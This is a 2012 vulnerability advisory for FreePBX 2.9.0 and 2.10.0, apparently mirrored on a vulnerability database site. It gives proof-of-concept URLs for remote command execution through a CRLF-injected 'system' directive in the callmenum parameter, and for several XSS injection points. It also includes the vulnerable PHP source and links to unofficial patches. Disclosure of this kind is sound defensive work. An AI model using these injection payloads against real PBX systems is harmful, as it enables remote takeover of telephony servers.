Vulners
Lucene search
FreePBX 2.10.0, 2.9.0 Multiple Vulnerabilities
Product: FreePBX
Version: 2.10.0, 2.9.0 and perhaps earlier versions
Type: Remote Command Execution, XSS
Release Date: March 14, 2012
Vendor Notification Date: Jun 12, 2011
Author: Martin Tschirsich
Overview:
A remote command execution vulnerability and some XSS in current and earlier
FreePBX versions due to missing input sanitization.
FreePBX is a popular implementation (500,000 active phone systems) of
Asterisk (telephony software) based around a web-based configuration
interface and other tools. Some of these installations are on a public IP
address.
Proof of Concept:
RCE:
[HOST]/recordings/misc/callme_page.php?action=c&callmenum=[PHONENUMBER] () from
-internal/n%0D%0AApplication:%20system%0D%0AData:%20[CMD]%0D%0A%0D%0A
XSS (2.9.0 and perhaps other versions):
[HOST]/panel/index_amp.php?context=[XSS]
[HOST]/panel/flash/mypage.php?clid=[XSS]
[HOST]/panel/flash/mypage.php?clidname=[base64_encode(XSS)]
[HOST]/panel/dhtml/index.php?context=/../%00">[XSS]
[HOST]/admin/views/freepbx_reload.php/"</script>[XSS]
[HOST]/recordings/index.php?login='>[XSS]
Details (RCE):
Missing input sanitization in htdocs/recordings/misc/callme_page.php:
// line 28-30:
$to = $_REQUEST['callmenum']; // vulnerable
$msgFrom = $_REQUEST['msgFrom'];
$new_path = substr($path, 0, -4);
// line 38:
$call_status = callme_startcall($to, $msgFrom, $new_path);
Missing input sanitization in htdocs/recordings/includes/callme.php:
// line 88-117:
function callme_startcall($to, $from, $new_path)
{
global $astman;
$channel = "Local/$to () from-internal/n"; // vulnerable
$context = "vm-callme";
$extension = "s";
$priority = "1";
$callerid = "VMAIL/$from";
...
/* Arguments to Originate: channel, extension, context, priority,
timeout, callerid, variable, account, application, data */
$status = $astman->Originate($channel, $extension, $context,
$priority, NULL, $callerid, $variable, NULL, NULL, NULL, NULL);
...
}
Unofficial Patch (RCE, tested with 2.9.0):
Patch htdocs/recordings/modules/callme_page.php:
http://pastebin.com/ZbX50qaZ
Patch htdocs/recordings/modules/voicemail.module:
http://pastebin.com/vv3qczfC
Disclaimer:
The vendor has been contacted and provided with a patch several times since
Jun 12, 2011. Since no intention to address this issue was shown, I felt it
was in the best interest to disclose the vulnerability.
All information in this advisory is provided on an 'as is' basis in the hope
that it will be useful. The author not responsible for any risks or
occurrences caused by the application of this information.
# 0day.today [2018-04-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Mar 2012 00:00Current
7.1High risk
Vulners AI Score7.1